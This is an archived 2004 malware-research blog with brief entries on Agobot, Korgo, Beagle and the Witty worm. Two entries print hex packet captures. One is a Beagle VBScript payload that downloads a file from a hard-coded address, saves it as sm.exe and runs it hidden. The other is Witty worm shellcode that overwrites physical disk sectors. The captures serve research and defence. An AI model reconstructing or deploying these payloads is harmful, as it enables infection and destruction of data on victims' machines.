historical vector data. stop tomorrow's worm

    vectorblog  about  contact

 

 

 

 

 

 

 

 


 2004 VECTORBLOG ENTRIES

The Vectorblog gained momentum in 2004, leading to the diary that exists today. The entries below are the random lines entered prior to August 2004.

July 3, 2004

Bot net.

Although the release of another variant of Agobot (NL on Trend Micro?s site) is hardly news, it corresponds to the release of a new report at infectionvectors.co, ?Agobot & the ?Kit?-chen Sink.? Check it out in the Vector Spaces section. The report analyzes the kit that constructs Agobot Trojans and where the kit belongs in virus kit history.

 

The new Agobot: http://www.trendmicro.com/vinfo/virusencyclo/default5.asp?VName=WORM_AGOBOT.NL

 

June 5, 2004

LSASS Cargo.

The Korgo worm shows potential for spreading as quickly as Sasser, except that many more machines should be patched by this point. For the cynics out there: at least many more corporate machines should be patched by now, relegating this to a home user problem.

 

April 1, 2004

4/1/04.

Maybe this is Beagle?s April Fools? joke, but the following packet was snatched by a honeypot machine and seems to indicate some behavior different from what is expected with Q-T. Check out this packet for the use of a private IP address. The address that is supposed to appear there is from the list of hard coded servers in the Beagle code, not the machine that was infected (which would be more of a P2P propagation). This was submitted to AV vendors for some clarification, but as of yet, there is no documented reason that any of the known Beagle variants would insert this address.

 

45 00 04 76 5B 64 40 00 80 06 CB 00 45 0A 70 6B    E..v[d@.....E.pk

8A 9C 90 0B 00 51 12 1B 44 AF 38 92 26 AD 0E 36    .....Q..D.8.&..6

50 19 43 2B 45 CF 00 00 68 74 74 70 3A 2F 2F 31    P.C+E...http://1

39 32 2E 31 36 38 2E 33 34 2E 32 30 3A 38 31 2F    92.168.34.20:81/

6D 61 75 63 78 72 64 2E 6A 70 65 67 22 22 2C 20    maucxrd.jpeg"",

46 61 6C 73 65 22 20 26 20 76 62 63 72 6C 66 0D    False" & vbcrlf.

0A 54 53 4F 2E 77 72 69 74 65 20 22 78 6D 6C 2E    .TSO.write "xml.

53 65 6E 64 22 20 26 20 76 62 63 72 6C 66 0D 0A    Send" & vbcrlf..

54 53 4F 2E 77 72 69 74 65 20 22 43 3D 43 3D 43    TSO.write "C=C=C

3D 43 22 20 26 20 76 62 63 72 6C 66 0D 0A 54 53    =C" & vbcrlf..TS

4F 2E 77 72 69 74 65 20 22 42 44 20 3D 20 78 6D    O.write "BD = xm

6C 2E 52 65 73 70 6F 6E 73 65 42 6F 64 79 22 20    l.ResponseBody"

26 20 76 62 63 72 6C 66 0D 0A 54 53 4F 2E 77 72    & vbcrlf..TSO.wr

69 74 65 20 22 43 3D 43 3D 43 3D 43 22 20 26 20    ite "C=C=C=C" &

76 62 63 72 6C 66 0D 0A 54 53 4F 2E 77 72 69 74    vbcrlf..TSO.writ

65 20 22 43 6F 6E 73 74 20 61 64 54 79 70 65 42    e "Const adTypeB

69 6E 61 72 79 20 3D 20 31 22 20 26 20 76 62 63    inary = 1" & vbc

72 6C 66 0D 0A 54 53 4F 2E 77 72 69 74 65 20 22    rlf..TSO.write "

43 6F 6E 73 74 20 61 64 53 61 76 65 43 72 65 61    Const adSaveCrea

74 65 4F 76 65 72 57 72 69 74 65 20 3D 20 32 22    teOverWrite = 2"

20 26 20 76 62 63 72 6C 66 0D 0A 54 53 4F 2E 77     & vbcrlf..TSO.w

72 69 74 65 20 22 43 3D 43 3D 43 3D 43 22 20 26    rite "C=C=C=C" &

20 76 62 63 72 6C 66 0D 0A 54 53 4F 2E 77 72 69     vbcrlf..TSO.wri

74 65 20 22 44 69 6D 20 42 69 6E 61 72 79 53 74    te "Dim BinarySt

72 65 61 6D 22 20 26 20 76 62 63 72 6C 66 0D 0A    ream" & vbcrlf..

54 53 4F 2E 77 72 69 74 65 20 22 43 3D 43 3D 43    TSO.write "C=C=C

3D 43 22 20 26 20 76 62 63 72 6C 66 0D 0A 54 53    =C" & vbcrlf..TS

4F 2E 77 72 69 74 65 20 22 53 65 74 20 42 69 6E    O.write "Set Bin

61 72 79 53 74 72 65 61 6D 20 3D 20 43 72 65 61    aryStream = Crea

74 65 4F 62 6A 65 63 74 28 22 22 41 44 4F 44 42    teObject(""ADODB

2E 53 74 72 65 61 6D 22 22 29 22 20 26 20 76 62    .Stream"")" & vb

63 72 6C 66 0D 0A 54 53 4F 2E 77 72 69 74 65 20    crlf..TSO.write

22 42 69 6E 61 72 79 53 74 72 65 61 6D 2E 54 79    "BinaryStream.Ty

70 65 20 3D 20 61 64 54 79 70 65 42 69 6E 61 72    pe = adTypeBinar

79 22 20 26 20 76 62 63 72 6C 66 0D 0A 54 53 4F    y" & vbcrlf..TSO

2E 77 72 69 74 65 20 22 41 3D 41 3D 41 3D 41 22    .write "A=A=A=A"

20 26 20 76 62 63 72 6C 66 0D 0A 54 53 4F 2E 77     & vbcrlf..TSO.w

72 69 74 65 20 22 42 69 6E 61 72 79 53 74 72 65    rite "BinaryStre

61 6D 2E 4F 70 65 6E 22 20 26 20 76 62 63 72 6C    am.Open" & vbcrl

66 0D 0A 54 53 4F 2E 77 72 69 74 65 20 22 42 69    f..TSO.write "Bi

6E 61 72 79 53 74 72 65 61 6D 2E 57 72 69 74 65    naryStream.Write

20 42 44 22 20 26 20 76 62 63 72 6C 66 0D 0A 54     BD" & vbcrlf..T

53 4F 2E 77 72 69 74 65 20 22 62 3D 62 3D 62 3D    SO.write "b=b=b=

62 22 20 26 20 76 62 63 72 6C 66 0D 0A 54 53 4F    b" & vbcrlf..TSO

2E 77 72 69 74 65 20 22 42 69 6E 61 72 79 53 74    .write "BinarySt

72 65 61 6D 2E 53 61 76 65 54 6F 46 69 6C 65 20    ream.SaveToFile

22 22 73 6D 2E 65 78 65 22 22 2C 20 61 64 53 61    ""sm.exe"", adSa

76 65 43 72 65 61 74 65 4F 76 65 72 57 72 69 74    veCreateOverWrit

65 22 20 26 20 76 62 63 72 6C 66 0D 0A 54 53 4F    e" & vbcrlf..TSO

2E 77 72 69 74 65 20 22 44 69 6D 20 57 73 68 53    .write "Dim WshS

68 65 6C 6C 22 20 26 20 76 62 63 72 6C 66 0D 0A    hell" & vbcrlf..

54 53 4F 2E 77 72 69 74 65 20 22 53 65 74 20 57    TSO.write "Set W

73 68 53 68 65 6C 6C 20 3D 20 43 72 65 61 74 65    shShell = Create

4F 62 6A 65 63 74 28 22 22 57 53 63 72 69 70 74    Object(""WScript

2E 53 68 65 6C 6C 22 22 29 22 20 26 20 76 62 63    .Shell"")" & vbc

72 6C 66 0D 0A 54 53 4F 2E 77 72 69 74 65 20 22    rlf..TSO.write "

57 73 68 53 68 65 6C 6C 2E 52 75 6E 20 22 22 73    WshShell.Run ""s

6D 2E 65 78 65 22 22 2C 20 30 2C 20 66 61 6C 73    m.exe"", 0, fals

65 22 20 26 20 76 62 63 72 6C 66 0D 0A 54 53 4F    e" & vbcrlf..TSO

2E 63 6C 6F 73 65 0D 0A 53 65 74 20 54 53 4F 20    .close..Set TSO

3D 20 4E 6F 74 68 69 6E 67 0D 0A 53 65 74 20 46    = Nothing..Set F

53 4F 20 3D 20 4E 6F 74 68 69 6E 67 0D 0A 44 69    SO = Nothing..Di

6D 20 57 73 68 53 68 65 6C 6C 0D 0A 53 65 74 20    m WshShell..Set

57 73 68 53 68 65 6C 6C 20 3D 20 43 72 65 61 74    WshShell = Creat

65 4F 62 6A 65 63 74 28 22 57 53 63 72 69 70 74    eObject("WScript

2E 53 68 65 6C 6C 22 29 0D 0A 57 73 68 53 68 65    .Shell")..WshShe

6C 6C 2E 52 75 6E 20 22 71 2E 76 62 73 22 2C 20    ll.Run "q.vbs",

30 2C 20 66 61 6C 73 65 0D 0A 3C 2F 53 43 52 49    0, false..</SCRI

50 54 3E 0D 0A 3C 73 63 72 69 70 74 3E 77 69 6E    PT>..<script>win

64 6F 77 2E 63 6C 6F 73 65 28 29 3C 2F 73 63 72    dow.close()</scr

69 70 74 3E 0D 0A 3C 2F 48 45 41 44 3E 0D 0A 3C    ipt>..</HEAD>..<

2F 48 54 4D 4C 3E                                  /HTML>         

 

March 21, 2004

Witty rejoinder.

For readers of the blog (especially those with ISS products in place), a packet from the scary Witty worm and a link to Symantec?s analysis:

 

12:54:45 10.10.10.1.4000 > 10.10.10.2:  udp 997

0x0000   4500 0401 d3b4 0000 7111 dda9 db9a 9ca1        E.......q.......

0x0010   41ad daa4 0fa0 c424 03ed dd38 0500 0000        A......$...8....

0x0020   0000 0012 0200 0000 0000 0000 0000 0000        ................

0x0030   0002 2c00 0500 0000 0000 006e 0000 0000        ..,........n....

0x0040   0000 0000 0000 0000 0000 0000 0001 0000        ................

0x0050   0000 0000 0000 0000 0000 0000 0000 0000        ................

0x0060   4102 0500 0000 0000 00de 0300 0000 0000        A...............

0x0070   0000 0000 0000 0000 0000 0100 0001 0000        ................

0x0080   0100 001e 0220 2020 2020 2020 285e 2e5e        ............(^.^

0x0090   2920 2020 2020 2069 6e73 6572 7420 7769        )......insert.wi

0x00a0   7474 7920 6d65 7373 6167 6520 6865 7265        tty.message.here

0x00b0   2e20 2020 2020 2028 5e2e 5e29 2020 2020        .......(^.^)....

0x00c0   2020 2089 e78b 7f14 83c7 0881 c4e8 fdff        ................

0x00d0   ff31 c966 b933 3251 6877 7332 5f54 3eff        .1.f.32Qhws2_T>.

0x00e0   159c 400d 5e89 c331 c966 b965 7451 6873        ..@.^..1.f.etQhs

0x00f0   6f63 6b54 533e ff15 9840 0d5e 6a11 6a02        ockTS>...@.^j.j.

0x0100   6a02 ffd0 89c6 31c9 5168 6269 6e64 5453        j.....1.QhbindTS

0x0110   3eff 1598 400d 5e31 c951 5151 81e9 feff        >...@.^1.QQQ....

0x0120   f05f 5189 e16a 1051 56ff d031 c966 b974        ._Q..j.QV..1.f.t

0x0130   6f51 6873 656e 6454 533e ff15 9840 0d5e        oQhsendTS>...@.^

0x0140   89c3 83c4 3c31 c951 6865 6c33 3268 6b65        ....<1.Qhel32hke

0x0150   726e 543e ff15 9c40 0d5e 31c9 5168 6f75        rnT>...@.^1.Qhou

0x0160   6e74 6869 636b 4368 4765 7454 5450 3eff        nthickChGetTTP>.

0x0170   1598 400d 5eff d089 c583 c41c 31c9 81e9        ..@.^.......1...

0x0180   e0b1 ffff 5131 c02d 03bc fcff f7e5 2d3d        ....Q1.-......-=

0x0190   61d9 ff89 c131 c02d 03bc fcff f7e1 2d3d        a....1.-......-=

0x01a0   61d9 ff89 c531 d252 52c1 e910 6689 c850        a....1.RR...f..P

0x01b0   31c0 2d03 bcfc fff7 e52d 3d61 d9ff 89c5        1.-......-=a....

0x01c0   30e4 b002 5089 e06a 1050 31c0 502d 03bc        0...P..j.P1.P-..

0x01d0   fcff f7e5 2d3d 61d9 ff89 c5c1 e817 80c4        ....-=a.........

0x01e0   0350 5756 ffd3 83c4 1059 e298 31c0 2d03        .PWV.....Y..1.-.

0x01f0   bcfc fff7 e52d 3d61 d9ff 89c5 c1e8 1080        .....-=a........

0x0200   e407 80cc 30b0 4550 6844 5249 5668 4943        ....0.EPhDRIVhIC

0x0210   414c 6850 4859 5368 5c5c 2e5c 89e0 31c9        ALhPHYSh\\.\..1.

0x0220   51b2 20c1 e218 526a 0351 6a03 d1e2 5250        Q.....Rj.Qj...RP

0x0230   3eff 15dc 400d 5e83 c414 31c9 81e9 e0b1        >...@.^...1.....

0x0240   ffff 3dff ffff ff0f 8437 ffff ff56 89c6        ..=......7...V..

0x0250   31c0 5050 2d03 bcfc fff7 e52d 3d61 d9ff        1.PP-......-=a..

0x0260   89c5 d1e8 6689 c850 563e ff15 c440 0d5e        ....f..PV>...@.^

0x0270   31c9 5189 e251 52b5 80d1 e151 b15e c1e1        1.Q..QR....Q.^..

0x0280   1851 563e ff15 9440 0d5e 563e ff15 3840        .QV>...@.^V>..8@

0x0290   0d5e 5e5e e9ac feff ff63 7607 5ee9 21fe        .^^^.....cv.^.!.

0x02a0   ffff 0043 666a 7663 6c62 3431 5051 3530        ...Cfjvclb41PQ50

0x02b0   6a48 3150 6334 5051 5559 4878 3774 654f        jH1Pc4PQUYHx7teO

0x02c0   7a54 5354 5954 654c 4d41 0d0a 446c 4433        zTSTYTeLMA..DlD3

0x02d0   5237 6c56 7442 4375 6b6b 6864 7a2b 3276        R7lVtBCukkhdz+2v

0x02e0   6f75 3033 4163 3557 4f52 6b75 7172 6764        ou03Ac5WORkuqrgd

0x02f0   4b72 7531 5a49 4f43 6c53 522f 7851 4f69        Kru1ZIOClSR/xQOi

0x0300   4b6f 3648 7a4a 7567 5272 4934 7337 4f6b        Ko6HzJugRrI4s7Ok

0x0310   534b 7750 714c 7534 0d0a 3562 614e 6252        SKwPqLu4..5baNbR

0x0320   3067 504e 5950 4000 3406 b662 4044 5219        0gPNYP@.4..b@DR.

0x0330   928e 0442 6741 6241 4630 4544 4141 5741        ...BgAbAF0EDAAWA

0x0340   4141 4141 4141 4141 4131 3833 223e 0a20        AAAAAAAAA183">..

0x0350   2020 2020 8001 0000 4600 0000 4600 0000        ........F...F...

0x0360   8000 0000 0200 0000 66cc 5b40 ef1c 0d00        ........f.[@....

0x0370   83e1 00b0 1100 0600 d003 0000 d003 0000        ................

0x0380   0004 0000 0200 0000 aacc 5b40 0e27 0700        ..........[@.'..

0x0390   83e1 0000 0000 0002 00b0 d02b a49b 0800        ...........+....

0x03a0   4500 03c2 0a72 0000 8011 0000 83e1 1bb1        E....r..........

0x03b0   ba54 02a2 0fa0 06a5 03ae eb72 0500 0000        .T.........r....

0x03c0   0000 0012 0200 0000 0000 0000 0000 0000        ................

0x03d0   0002 2c00 0500 0000 0000 006e 0000 0000        ..,........n....

0x03e0   0000 0000 0000 0032 5e80 1d33 1d20 0c95        .......2^..3....

0x03f0   8310 167b 1100 0700 4600 0000 4600 0000        ...{....F...F...

0x0400   80                                             .

 

Witty: http://securityresponse.symantec.com/avcenter/venc/data/w32.witty.worm.html

 

 

Copyright Ӎ 2004 infectionvectors.com. All rights reserved.